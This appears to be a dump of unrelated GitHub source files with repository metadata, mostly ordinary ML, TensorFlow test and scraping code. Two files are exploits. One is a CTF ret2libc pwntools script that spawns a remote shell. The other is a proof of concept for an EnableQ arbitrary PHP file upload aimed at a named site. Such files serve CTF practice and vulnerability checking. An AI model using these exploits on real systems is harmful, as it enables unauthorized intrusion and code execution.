        # Delegate unknown attribute lookups to the most recent response.
        return getattr(self._response, name)
    @property
    async def pages(self) -> AsyncIterable[game_server_configs.ListGameServerConfigsResponse]:
        # Yield the current page, then await further pages until the
        # service stops returning a next_page_token.
        yield self._response
        while self._response.next_page_token:
            self._request.page_token = self._response.next_page_token
            self._response = await self._method(self._request, metadata=self._metadata)
            yield self._response
    def __aiter__(self) -> AsyncIterable[game_server_configs.GameServerConfig]:
        # Flatten the pages into an async stream of GameServerConfig items.
        async def async_generator():
            async for page in self.pages:
                for response in page.game_server_configs:
                    yield response
        return async_generator()
    def __repr__(self) -> str:
        return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
|
[
"bazel-bot-development[bot]@users.noreply.github.com"
] |
bazel-bot-development[bot]@users.noreply.github.com
|
adae1e88338dd1bbc45f87704aed5a39cb62a3b4
|
33300abc9da0dfecf538d78fa51b23a85d2ddb6f
|
/tensorflow/python/saved_model/load_test.py
|
0f7fba0c66ef87ae4e9869318b63886c5b646404
|
[
"Apache-2.0"
] |
permissive
|
danilo-augusto/tensorflow
|
b8e9ef8ebd489a62eab31e41fcdf0070e42ad348
|
4c7452c8c9b632d7ad7232099637e6fe388c3dd2
|
refs/heads/master
| 2022-05-31T03:00:12.090962
| 2018-12-19T23:11:25
| 2018-12-20T03:43:38
| 162,523,290
| 1
| 0
|
Apache-2.0
| 2022-04-17T02:40:23
| 2018-12-20T03:45:42
|
C++
|
UTF-8
|
Python
| false
| false
| 7,775
|
py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for checkpointable object SavedModel loading."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tempfile
from tensorflow.python.eager import def_function
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import tensor_spec
from tensorflow.python.lib.io import file_io
from tensorflow.python.ops import variables
from tensorflow.python.saved_model import load
from tensorflow.python.saved_model import save
from tensorflow.python.training.checkpointable import tracking
class LoadTest(test.TestCase):
  """Round-trip tests for SavedModel loading of checkpointable objects.

  Each test saves an object graph with ``save.save`` and reloads it with
  ``load.load``, checking that structure, variables, assets and traced
  functions survive the round trip.

  Only change from the original: the deprecated ``assertEquals`` alias is
  replaced with ``assertEqual`` throughout.
  """

  def cycle(self, obj):
    """Save *obj* to a temp dir (without signatures) and load it back."""
    path = tempfile.mkdtemp(prefix=self.get_temp_dir())
    save.save(obj, path, signatures={})
    return load.load(path)

  def test_structure_import(self):
    # Object identity (shared vs. distinct dependencies) must survive.
    root = tracking.Checkpointable()
    root.f = def_function.function(
        lambda x: 2. * x,
        input_signature=[tensor_spec.TensorSpec(None, dtypes.float32)])
    root.dep_one = tracking.Checkpointable()
    root.dep_two = tracking.Checkpointable()
    root.dep_two.dep = tracking.Checkpointable()
    root.dep_three = root.dep_two.dep
    imported = self.cycle(root)
    self.assertIs(imported.dep_three, imported.dep_two.dep)
    self.assertIsNot(imported.dep_one, imported.dep_two)
    self.assertEqual(4., imported.f(constant_op.constant(2.)).numpy())

  def test_variables(self):
    root = tracking.Checkpointable()
    root.v1 = variables.Variable(1.)
    root.v2 = variables.Variable(2.)
    root.f = def_function.function(
        lambda x: root.v2 * x,
        input_signature=[tensor_spec.TensorSpec(None, dtypes.float32)])
    imported = self.cycle(root)
    self.assertEqual(imported.v1.numpy(), 1.0)
    self.assertEqual(imported.v2.numpy(), 2.0)
    self.assertEqual(4., imported.f(constant_op.constant(2.)).numpy())

  def _make_asset(self, contents):
    """Write *contents* to a fresh temp file and return its path."""
    filename = tempfile.mktemp(prefix=self.get_temp_dir())
    with open(filename, "w") as f:
      f.write(contents)
    return filename

  def test_assets_import(self):
    # Assets must be copied into the SavedModel: deleting the originals and
    # moving the save directory should not break loading.
    file1 = self._make_asset("contents 1")
    file2 = self._make_asset("contents 2")
    root = tracking.Checkpointable()
    root.f = def_function.function(
        lambda x: 2. * x,
        input_signature=[tensor_spec.TensorSpec(None, dtypes.float32)])
    root.asset1 = tracking.TrackableAsset(file1)
    root.asset2 = tracking.TrackableAsset(file2)
    save_dir = os.path.join(self.get_temp_dir(), "save_dir")
    save.save(root, save_dir)
    file_io.delete_file(file1)
    file_io.delete_file(file2)
    load_dir = os.path.join(self.get_temp_dir(), "load_dir")
    file_io.rename(save_dir, load_dir)
    imported = load.load(load_dir)
    with open(imported.asset1.asset_path.numpy(), "r") as f:
      self.assertEqual("contents 1", f.read())
    with open(imported.asset2.asset_path.numpy(), "r") as f:
      self.assertEqual("contents 2", f.read())

  def test_capture_assets(self):
    # An asset captured by a function should be rewritten to a new path
    # inside the SavedModel, with identical contents.
    root = tracking.Checkpointable()
    root.vocab = tracking.TrackableAsset(self._make_asset("contents"))
    root.f = def_function.function(
        lambda: root.vocab.asset_path,
        input_signature=[])
    imported = self.cycle(root)
    origin_output = root.f().numpy()
    imported_output = imported.f().numpy()
    self.assertNotEqual(origin_output, imported_output)
    with open(imported_output, "r") as f:
      self.assertEqual("contents", f.read())

  def test_assets_dedup(self):
    # Two TrackableAssets pointing at the same file should resolve to one
    # asset path after the round trip.
    vocab = self._make_asset("contents")
    root = tracking.Checkpointable()
    root.f = def_function.function(
        lambda x: 2. * x,
        input_signature=[tensor_spec.TensorSpec(None, dtypes.float32)])
    root.asset1 = tracking.TrackableAsset(vocab)
    root.asset2 = tracking.TrackableAsset(vocab)
    imported = self.cycle(root)
    self.assertEqual(imported.asset1.asset_path.numpy(),
                     imported.asset2.asset_path.numpy())

  def test_implicit_input_signature(self):
    @def_function.function
    def func(x):
      return 2 * x
    root = tracking.Checkpointable()
    root.f = func
    # Add two traces so both dtypes are available after loading.
    root.f(constant_op.constant(1.))
    root.f(constant_op.constant(1))
    imported = self.cycle(root)
    self.assertEqual(4., imported.f(constant_op.constant(2.)).numpy())
    self.assertEqual(14, imported.f(constant_op.constant(7)).numpy())

  def test_explicit_input_signature(self):
    @def_function.function(
        input_signature=[tensor_spec.TensorSpec(None, dtypes.float32)])
    def func(x):
      return 2 * x
    root = tracking.Checkpointable()
    root.f = func
    imported = self.cycle(root)
    self.assertEqual(4., imported.f(constant_op.constant(2.0)).numpy())

  def test_function_with_default_bool_input(self):
    def func(x, training=False):
      if training:
        return 2 * x
      else:
        return 7
    root = tracking.Checkpointable()
    root.f = def_function.function(func)
    self.assertEqual(20, root.f(constant_op.constant(10), True).numpy())
    self.assertEqual(7, root.f(constant_op.constant(1)).numpy())
    self.assertEqual(2, root.f(constant_op.constant(1), True).numpy())
    imported = self.cycle(root)
    self.assertEqual(4, imported.f(constant_op.constant(2), True).numpy())
    self.assertEqual(7, imported.f(constant_op.constant(2)).numpy())

  def test_positional_arguments(self):
    # Defaults and keyword overrides must be preserved through save/load.
    def func(x, training=False, abc=7.1, defg=7.7):
      del abc
      if training:
        return 2 * x
      if defg == 7:
        return 6
      else:
        return 7
    root = tracking.Checkpointable()
    root.f = def_function.function(func)
    self.assertEqual(20, root.f(constant_op.constant(10), True).numpy())
    self.assertEqual(7, root.f(constant_op.constant(1)).numpy())
    self.assertEqual(2, root.f(constant_op.constant(1), True).numpy())
    self.assertEqual(6, root.f(constant_op.constant(1), defg=7.0).numpy())
    imported = self.cycle(root)
    self.assertEqual(4, imported.f(constant_op.constant(2), True).numpy())
    self.assertEqual(7, imported.f(constant_op.constant(2)).numpy())
    self.assertEqual(6, imported.f(constant_op.constant(1), defg=7.0).numpy())

  def test_member_function(self):
    # Methods capturing instance state must keep that state after loading.
    class CheckpointableWithMember(tracking.Checkpointable):

      def __init__(self):
        super(CheckpointableWithMember, self).__init__()
        self._some_value = 20

      @def_function.function
      def f(self, x, training=False):
        if training:
          return 2 * x
        else:
          return 7 + self._some_value

    root = CheckpointableWithMember()
    self.assertEqual(20, root.f(constant_op.constant(10), True).numpy())
    self.assertEqual(27, root.f(constant_op.constant(1)).numpy())
    self.assertEqual(2, root.f(constant_op.constant(1), True).numpy())
    imported = self.cycle(root)
    self.assertEqual(4, imported.f(constant_op.constant(2), True).numpy())
    self.assertEqual(27, imported.f(constant_op.constant(2)).numpy())


if __name__ == "__main__":
  test.main()
|
[
"gardener@tensorflow.org"
] |
gardener@tensorflow.org
|
5f43eae02bad6a1ff86c9481554169d3de844a66
|
7194e972dfb2b7f0334e366bfa4b8bf0c578017e
|
/BsidesDelhictf2020/thanksforattending/exploit.py
|
41175edb1468bb3f5000575b925bf70f9319d0d1
|
[] |
no_license
|
Darksidesfear/CTFarchives
|
a571b5c4580d4a62cc501fc2ed1d3c2f8c41e90f
|
8baa495dc758e0f56813ffa0d5a1190a21d0bb09
|
refs/heads/master
| 2023-01-09T04:41:59.693240
| 2020-11-14T12:39:16
| 2020-11-14T12:39:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 775
|
py
|
#exploit for thanksforattending
#BSDCTF{3xpl0r1ng_th3_unkn0wn}
from pwn import *
import time
elf = ELF("./chall")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux.so.2")
context.binary=elf
target=remote('13.233.104.112',2222)
context.log_level='DEBUG'
def sla(string,val):
target.sendlineafter(string,val)
def sa(string,val):
target.sendafter(string,val)
main=0x080491F6
puts_plt=0x80490a0
payload="A"*0x28+p32(puts_plt)+p32(main)+p32(elf.got["puts"])
sla("name?\n",payload)
target.recvuntil("!\n")
libc_puts=u32(target.recv(4))
libc_base=libc_puts-libc.sym["puts"]
libc_system=libc_base+libc.sym["system"]
libc_binsh=libc_base+libc.search("/bin/sh\x00").next()
payload="A"*0x28+p32(libc_system)+p32(0xdeadbeef)+p32(libc_binsh)
sla("name?\n",payload)
target.interactive()
|
[
"arav1635@gmail.com"
] |
arav1635@gmail.com
|
21ff2fade9bf04a8e6cfbb5544b7d85718b518d9
|
8ffa21848cfc7d1b1ac76d53fd181147dfd29953
|
/api-test/py-test/Part3_Python_CookBook/test_selfdef_exp.py
|
5795486fc1dae8aa22f6eeb68f11c1ed11564383
|
[] |
no_license
|
un-knower/data-base
|
51cfefd91970073c61ccd2f5f7034ccc5d86a794
|
3274f828d326af8dbd7600530f4c0264a0bc7ba3
|
refs/heads/master
| 2020-04-02T16:35:05.287543
| 2018-09-24T11:34:03
| 2018-09-24T11:34:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,755
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Author: HuHao <huhao1@cmcm.com>
Date: '2018/7/21'
Info:
自定义异常类应该总是继承自内置的 Exception 类, 或者是继承自那些本身就是从 Exception 继承而来的类。
尽管所有类同时也继承自 BaseException ,但你不应该使用这个基类来定义新的异常。 BaseException 是为系统退出异常而保留的,
比如 KeyboardInterrupt 或 SystemExit 以及其他那些会给应用发送信号而退出的异常。 因此,捕获这些异常本身没什么意义。
这样的话,假如你继承 BaseException 可能会导致你的自定义异常不会被捕获而直接发送信号退出程序运行。
"""
import os,traceback
class NetworkError(Exception):
pass
class HostnameError(NetworkError):
pass
class TimeoutError(NetworkError):
pass
class ProtocolError(NetworkError):
pass
class CustomerError(Exception):
def __init__(self,msg,status):
# 复写 __init__ 函数时,需要调用super().__init()保证父类参数也被重新实例化
super().__init__(msg,status)
self.msg = msg
self.status = status
def test_customer():
try:
raise CustomerError('customer error',20)
except Exception as e:
print(e.msg,e.status)
print(e.args)
def test_args():
'''
. 很多其他函数库和部分Python库默认所有异常都必须有 .args 属性, 因此如果你忽略了这一步,
你会发现有些时候你定义的新异常不会按照期望运行。
'''
try:
raise RuntimeError('It failed',43,'spam')
except RuntimeError as e:
print(e.args)
if __name__=="__main__":
try:
# test_customer()
test_args()
pass
except:
traceback.print_exc()
finally:
os._exit(0)
|
[
"huhao1@cmcm.com"
] |
huhao1@cmcm.com
|
cd9ff35e22a5ef807d3bd91348b03c240a03531e
|
1ac304bb90a6635b2723455c043811c4f0fdfdf8
|
/python/mead/tf/preprocessor.py
|
c08f2d6e89eb66b45539ae187b2a905c3c3d0f47
|
[
"Apache-2.0"
] |
permissive
|
harutatsuakiyama/baseline
|
36882463638989c376121006d34e369007830f00
|
3aad1addfedad3b2ce2c78bab95855c0d41a5c93
|
refs/heads/master
| 2023-07-23T22:57:43.320828
| 2018-07-03T14:16:22
| 2018-07-03T14:16:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,645
|
py
|
import tensorflow as tf
class PreprocessorCreator(object):
def __init__(self, indices, lchars, upchars_lut, task, token_key, extra_feats):
"""
indices are created during vocab creation.
"""
self.word2index = indices['word']
self.char2index = indices.get('char')
self.indices = indices
self.lchars = lchars
self.upchars_lut = upchars_lut
self.task = task
self.token_key = token_key
self.extra_feats = extra_feats
def preproc_post(self, post_mappings):
# Split the input string, assuming that whitespace is splitter
# The client should perform any required tokenization for us and join on ' '
# WARNING: This can be a bug if the user defaults the values (-1)
# for conll, the mxlen=124, for idr, the mxlen is forced to a max BPTT
# for twpos, the mxlen=38
# this should probably be fixed by serializing the mxlen of the model
# or rereading it from the tensor from file
raw_post = post_mappings[self.token_key]
# raw_post = post_mappings
mxlen = self.task.config_params['preproc']['mxlen']
mxwlen = self.task.config_params['preproc'].get('mxwlen')
nraw_post = self._reform_raw(raw_post, mxlen)
preprocs = {}
words, sentence_length = self._create_word_vectors_from_post(nraw_post, mxlen)
preprocs['word'] = words
if 'char' in self.indices:
chars, _ = self._create_char_vectors_from_post(nraw_post, mxlen, mxwlen)
preprocs['char'] = chars
for extra in self.extra_feats:
index = self.indices[extra]
nraw = self._reform_raw(post_mappings[extra], mxlen)
t, _ = self._create_vectors_from_post(nraw, mxlen, index)
preprocs[extra] = t
return preprocs, sentence_length
def _reform_raw(self, raw, mxlen):
"""
Splits and rejoins a string to ensure that tokens meet
the required max len.
"""
#raw_post = tf.Print(raw_post, [raw_post])
raw_tokens = tf.string_split(tf.reshape(raw, [-1])).values
# sentence length <= mxlen
nraw_post = tf.reduce_join(raw_tokens[:mxlen], separator=" ")
return nraw_post
def _create_word_vectors_from_post(self, nraw_post, mxlen):
# vocab has only lowercase words
split_chars = tf.string_split(tf.reshape(nraw_post, [-1]), delimiter="").values
upchar_inds = self.upchars_lut.lookup(split_chars)
lc_raw_post = tf.reduce_join(tf.map_fn(lambda x: tf.cond(x[0] > 25,
lambda: x[1],
lambda: self.lchars[x[0]]),
(upchar_inds, split_chars), dtype=tf.string))
word_tokens = tf.string_split(tf.reshape(lc_raw_post, [-1]))
word_indices = self.word2index.lookup(word_tokens)
# Reshape them out to the proper length
reshaped_words = tf.sparse_reshape(word_indices, shape=[-1])
sentence_length = tf.size(reshaped_words) # tf.shape if 2 dims needed
x = self._reshape_indices(reshaped_words, [mxlen])
return x, sentence_length
def _create_char_vectors_from_post(self, nraw_post, mxlen, mxwlen):
# numchars per word should be <= mxwlen
unchanged_word_tokens = tf.string_split(tf.reshape(nraw_post, [-1]))
culled_word_token_vals = tf.substr(unchanged_word_tokens.values, 0, mxwlen)
char_tokens = tf.string_split(culled_word_token_vals, delimiter='')
char_indices = self.char2index.lookup(char_tokens)
xch = self._reshape_indices(char_indices, [mxlen, mxwlen])
sentence_length = tf.size(xch)
return xch, sentence_length
def _create_vectors_from_post(self, nraw_post, mxlen, index):
tokens = tf.string_split(tf.reshape(nraw_post, [-1]))
indices = index.lookup(tokens)
# Reshape them out to the proper length
reshaped = tf.sparse_reshape(indices, shape=[-1])
sentence_length = tf.size(reshaped) # tf.shape if 2 dims needed
print(sentence_length)
return self._reshape_indices(reshaped, [mxlen]), sentence_length
def _reshape_indices(self, indices, shape):
reshaped = tf.sparse_reset_shape(indices, new_shape=shape)
# Now convert to a dense representation
x = tf.sparse_tensor_to_dense(reshaped)
x = tf.contrib.framework.with_shape(shape, x)
return x
|
[
"dpressel@gmail.com"
] |
dpressel@gmail.com
|
37a9955dafd0fc6d44b7e96543830a76e22fb9f9
|
3cdd50dc60a4e7cbba204403aa6a9689d58738a8
|
/scripts/video2animeframes.py
|
6b4428fbbb6d2ec18aca17a2a278889907fe6446
|
[] |
no_license
|
w13ww/AnimeGANv2_pytorch
|
ea6df68d34ad7012517222b1c61290d27fef2118
|
45885494e99eb46a914f24a6880aad40d6bee84a
|
refs/heads/main
| 2023-06-03T09:30:39.045119
| 2021-06-27T07:15:18
| 2021-06-27T07:15:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,130
|
py
|
# coding: utf-8
# Author: wanhui0729@gmail.com
import os, sys
project_path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(project_path)
import cv2
import torch
import argparse
import numpy as np
from tqdm import tqdm
from PIL import Image
from animeganv2.configs import cfg
from animeganv2.modeling.generator import build_generator
from animeganv2.data.transforms.build import build_transforms
from animeganv2.utils.model_serialization import load_state_dict
from animeganv2.modeling.utils import adjust_brightness_from_src_to_dst
def get_model(model_weight, device):
model = build_generator(cfg)
checkpoint = torch.load(model_weight, map_location=torch.device("cpu"))
load_state_dict(model, checkpoint.pop("models").pop("generator"))
model.to(device)
return model
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
"--config-file",
default="",
metavar="FILE",
help="path to config file",
type=str,
)
parser.add_argument(
"--video_path",
type=str,
required=True
)
parser.add_argument(
"--output_path",
type=str,
required=True
)
parser.add_argument(
"opts",
help="Modify config options using the command-line",
default=None,
nargs=argparse.REMAINDER,
)
args = parser.parse_args()
cfg.merge_from_file(args.config_file)
cfg.merge_from_list(args.opts)
cfg.freeze()
video_path = args.video_path
output_path = args.output_path
model_weight = cfg.MODEL.WEIGHT
device = torch.device(cfg.MODEL.DEVICE)
model = get_model(model_weight, device)
model.eval()
transform = build_transforms(cfg, False)
videos = os.listdir(video_path)
for video in tqdm(videos):
try:
videoPath = os.path.join(video_path, video)
outputDir = os.path.join(output_path, video)
if os.path.exists(outputDir):
continue
os.mkdir(outputDir)
videoCapture = cv2.VideoCapture(videoPath)
frame_num = int(videoCapture.get(cv2.CAP_PROP_FRAME_COUNT))
for i in tqdm(range(frame_num)):
success, frame = videoCapture.read()
frame = cv2.resize(frame, (1920, 1080))
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
input = Image.fromarray(frame)
input = transform([input])[0][0].unsqueeze(0)
input = input.to(device)
with torch.no_grad():
pred = model(input).cpu()
pred_img = (pred.squeeze() + 1.) / 2 * 255
pred_img = pred_img.permute(1, 2, 0).numpy().clip(0, 255).astype(np.uint8)
pred_img = adjust_brightness_from_src_to_dst(pred_img, frame)
video_frame = cv2.cvtColor(pred_img, cv2.COLOR_RGB2BGR)
cv2.imwrite(os.path.join(outputDir, '{}.jpg'.format(i)), video_frame)
videoCapture.release()
except:
continue
if __name__ == '__main__':
main()
|
[
"13658247573@163.com"
] |
13658247573@163.com
|
93588fbdc90eb41278a4ea6c88b24176f50fec7d
|
43ff15a7989576712d0e51f0ed32e3a4510273c0
|
/tools/pocs/bugscan/exp_1672.py
|
60046495bc3b154b90d6fe925db050e888d2a320
|
[] |
no_license
|
v1cker/kekescan
|
f2b51d91a9d6496e2cdc767eb6a600171f513449
|
3daa1775648439ba9e0003a376f90b601820290e
|
refs/heads/master
| 2020-09-19T16:26:56.522453
| 2017-06-15T02:55:24
| 2017-06-15T02:55:24
| 94,495,007
| 6
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,784
|
py
|
# -*- coding: utf-8 -*-
from dummy import *
from miniCurl import Curl
curl = Curl()
#-*- encoding:utf-8 -*-
# Title EnableQ官方免费版任意文件上传
# Referer http://www.wooyun.org/bugs/wooyun-2010-0128219
def assign(service, arg):
if service == "enableq":
return True, arg
def audit(arg):
raw = """POST /Android/FileUpload.php?optionID=1 HTTP/1.1
Host: xxxxx.com
Content-Length: 316
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: null
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 UBrowser/5.5.7386.17 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQXp86Nj8hIcFckX4
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=8ff192ee943f84f5047a44d02f4b453e
------WebKitFormBoundaryQXp86Nj8hIcFckX4
Content-Disposition: form-data; name="uploadedfile_1"; filename="xxx.php"
Content-Type: application/octet-stream
<?php echo md5(1);unlink(__FILE__);?>
------WebKitFormBoundaryQXp86Nj8hIcFckX4
Content-Disposition: form-data; name="button"
提交
------WebKitFormBoundaryQXp86Nj8hIcFckX4--"""
url = arg + 'Android/FileUpload.php?optionID=1'
code, head,res, errcode, _ = curl.curl2(url,raw=raw)
if code == 200 and 'true|1|' in res:
File = res.replace('true|1|','PerUserData/tmp/')
url2 = arg + File
code, head,res, errcode, _ = curl.curl2(url2)
if code==200 and 'c4ca4238a0b923820dcc509a6f75849b' in res:
security_hole(url)
if __name__ == '__main__':
from dummy import *
audit(assign('enableq', 'http://isurvey.pamri.com/')[1])
|
[
"liyueke@huobi.com"
] |
liyueke@huobi.com
|
e1ef348edf0b502bc60a1db5bcc1ec87914047ab
|
60d737103373825b858e67292865bda8c6f2094f
|
/active/ieee_picker.py
|
365e7c5efc90e338a2f4d230b93c5f08faf084fa
|
[] |
no_license
|
fschwenn/ejlmod
|
fbf4692b857f9f056f9105a7f616a256725f03b6
|
ef17512c2e44baa0164fdc6abc997c70ed3d2a74
|
refs/heads/master
| 2023-01-24T18:56:35.581517
| 2023-01-20T11:18:16
| 2023-01-20T11:18:16
| 91,459,496
| 1
| 1
| null | 2021-10-04T11:58:15
| 2017-05-16T13:06:57
|
Python
|
UTF-8
|
Python
| false
| false
| 6,203
|
py
|
# -*- coding: utf-8 -*-
#program to harvest individual IEEE articles bei DOIs
#FS: 2018-01-26
import getopt
import sys
import os
import urllib2
import urlparse
from bs4 import BeautifulSoup
import re
import ejlmod2
import codecs
import time
import datetime
import json
xmldir = '/afs/desy.de/user/l/library/inspire/ejl'
retfiles_path = "/afs/desy.de/user/l/library/proc/retinspire/retfiles"
now = datetime.datetime.now()
stampoftoday = '%4d-%02d-%02d' % (now.year, now.month, now.day)
publisher = 'IEEE'
jnlfilename = 'ieee_picker-%s' % (stampoftoday)
urltrunc = "http://ieeexplore.ieee.org"
dois = sys.argv[1:]
def meta_with_name(tag):
return tag.name == 'meta' and tag.has_attr('name')
def fsunwrap(tag):
try:
for i in tag.find_all('i'):
cont = i.string
i.replace_with(cont)
except:
print 'fsunwrap-i-problem'
try:
for b in tag.find_all('b'):
cont = b.string
b.replace_with(cont)
except:
print 'fsunwrap-b-problem'
try:
for sup in tag.find_all('sup'):
cont = sup.string
sup.replace_with('^'+cont)
except:
print 'fsunwrap-sup-problem'
try:
for sub in tag.find_all('sub'):
cont = sub.string
sub.replace_with('_'+cont)
except:
print 'fsunwrap-sub-problem'
try:
for form in tag.find_all('formula',attrs={'formulatype': 'inline'}):
form.replace_with(' [FORMULA] ')
except:
print 'fsunwrap-form-problem'
return tag
def referencetostring(reference):
refstring = re.sub('\s+',' ',fsunwrap(reference).prettify())
refstring = re.sub('<li> *(.*) *<br.*',r'\1',refstring)
for a in reference.find_all('a'):
if a.has_attr('href') and re.search('dx.doi.org\/',a['href']):
refstring += ', doi: %s' % (re.sub('.*dx.doi.org\/','',a['href']))
return refstring
recs = []
i = 0
for doi in dois:
i += 1
print '---{ %i/%i }---{ %s}------' % (i, len(dois), doi)
tc = 'P'
rec = {'keyw' : [], 'autaff' : [], 'tc' : tc}
try:
articlepage = BeautifulSoup(urllib2.urlopen('http://dx.doi.org/%s' % (doi),timeout=300))
time.sleep(6)
except:
print "retry in 60 seconds"
time.sleep(60)
articlepage = BeautifulSoup(urllib2.urlopen('http://dx.doi.org/%s' % (doi),timeout=300))
#metadata now in javascript
for script in articlepage.find_all('script', attrs = {'type' : 'text/javascript'}):
if re.search('global.document.metadata', script.text):
gdm = re.sub('[\n\t]', '', script.text).strip()
gdm = re.sub('.*global.document.metadata=(\{.*\}).*', r'\1', gdm)
gdm = json.loads(gdm)
rec['jnl'] = gdm['publicationTitle']
if rec['jnl'] == 'IEEE Computer Graphics and Applications':
rec['jnl'] = 'IEEE Comp.Graph.App.'
elif rec['jnl'] == 'IEEE Sensors Journal':
rec['jnl'] = 'IEEE Sensors J.'
elif rec['jnl'] == 'IEEE Transactions on Applied Superconductivity':
rec['jnl'] = 'IEEE Trans.Appl.Supercond.'
elif rec['jnl'] == 'IEEE Transactions on Circuits and Systems I: Regular Papers':
rec['jnl'] = 'IEEE Trans.Circuits Theor.'
elif rec['jnl'] == 'IEEE Transactions on Magnetics':
rec['jnl'] = 'IEEE Trans.Magnetics'
elif rec['jnl'] == 'IEEE Transactions on Nuclear Science':
rec['jnl'] = 'IEEE Trans.Nucl.Sci.'
elif rec['jnl'] == 'Journal of Lightwave Technology':
rec['jnl'] = 'J.Lightwave Tech.'
else:
rec['jnl'] = 'BOOK'
if gdm.has_key('authors'):
for author in gdm['authors']:
autaff = [author['name']]
if author.has_key('affiliation'):
autaff.append(author['affiliation'])
if author.has_key('orcid'):
autaff.append('ORCID:'+author['orcid'])
rec['autaff'].append(autaff)
if rec['jnl'] in ['IEEE Trans.Magnetics', 'IEEE Trans.Appl.Supercond.']:
if gdm.has_key('externalId'):
rec['p1'] = gdm['externalId']
elif gdm.has_key('articleNumber'):
rec['p1'] = gdm['articleNumber']
else:
rec['p1'] = gdm['startPage']
rec['p2'] = gdm['endPage']
else:
if gdm.has_key('endPage'):
rec['p1'] = gdm['startPage']
rec['p2'] = gdm['endPage']
elif gdm.has_key('externalId'):
rec['p1'] = gdm['externalId']
else:
rec['p1'] = gdm['articleNumber']
if gdm['isFreeDocument']:
rec['FFT'] = urltrunc + gdm['pdfPath']
rec['tit'] = gdm['formulaStrippedArticleTitle']
if gdm.has_key('abstract'):
rec['abs'] = gdm['abstract']
## mistake in metadata
if re.search('\d+ pp', gdm['startPage']):
rec['pages'] = re.sub(' .*', '', gdm['startPage'])
rec['p1'] = str(int(gdm['endPage']) - int(rec['pages']) + 1)
else:
try:
rec['pages'] = int(re.sub(' .*', '', gdm['endPage'])) - int(gdm['startPage']) + 1
except:
pass
rec['doi'] = gdm['doi']
if gdm.has_key('keywords'):
for kws in gdm['keywords']:
for kw in kws['kwd']:
if not kw in rec['keyw']:
rec['keyw'].append(kw)
try:
rec['date'] = re.sub('\.', '', gdm['journalDisplayDateOfPublication'])
except:
rec['date'] = re.sub('\.', '', gdm['publicationDate'])
rec['year'] = rec['date'][-4:]
if gdm.has_key('issue'):
rec['issue'] = gdm['issue']
if gdm.has_key('volume'):
rec['vol'] = gdm['volume']
if gdm['isConference']:
rec['tc'] = 'C'
rec['note'] = [gdm['publicationTitle']]
recs.append(rec)
#closing of files and printing
xmlf = os.path.join(xmldir,jnlfilename+'.xml')
xmlfile = codecs.EncodedFile(codecs.open(xmlf,mode='wb'),'utf8')
ejlmod2.writenewXML(recs,xmlfile,publisher, jnlfilename)
xmlfile.close()
#retrival
retfiles_text = open(retfiles_path,"r").read()
line = jnlfilename+'.xml'+ "\n"
if not line in retfiles_text:
retfiles = open(retfiles_path,"a")
retfiles.write(line)
retfiles.close()
|
[
"florian.schwennsen@desy.de"
] |
florian.schwennsen@desy.de
|
59c077a63d563e4e4f1ae1c02b2bb9e3d7f9a62f
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_200/3922.py
|
6c513e10347dca58684665070d3a5aafe553781e
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,226
|
py
|
# from __future__ import print_function
import os
import sys
def smallest_tidy_n(n_str):
# for the single digit special case
if len(n_str) == 1:
return n_str
# special case: identical digits
if n_str == n_str[0] * len(n_str):
return n_str
# for the special case of something like:
# 110, 101, 100
# ( answer in these cases is 99)
for i in range(len(n_str)):
if int(n_str[i]) > 1 :
break
if i == len(n_str)-1:
return "9" * (len(n_str) - 1)
res = n_str[0]
for i in range(len(n_str)-2, -1, -1):
if int(n_str[i+1]) < int(n_str[i]):
# print(12312312)
return smallest_tidy_n( n_str[0:i] + str(int(n_str[i])-1) + "9" * (len(n_str)-i-1) )
return n_str
def remove_trailing_zeros(n_str):
start = 0
for i in range(len(n_str)):
if n_str[i] == '0':
start = i+1
break
return n_str[start:]
f = open(sys.argv[1])
outf = open(sys.argv[1] + ".out", 'w')
n = int(f.readline())
#
for nth in range(n):
num_str = f.readline().strip()
tidy = smallest_tidy_n(num_str)
tidy = remove_trailing_zeros(tidy)
res = "Case #%d: %s" % (nth+1, tidy)
# print(num_str)
# print(res)
if nth < n-1:
res = res + "\n"
outf.write(res)
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.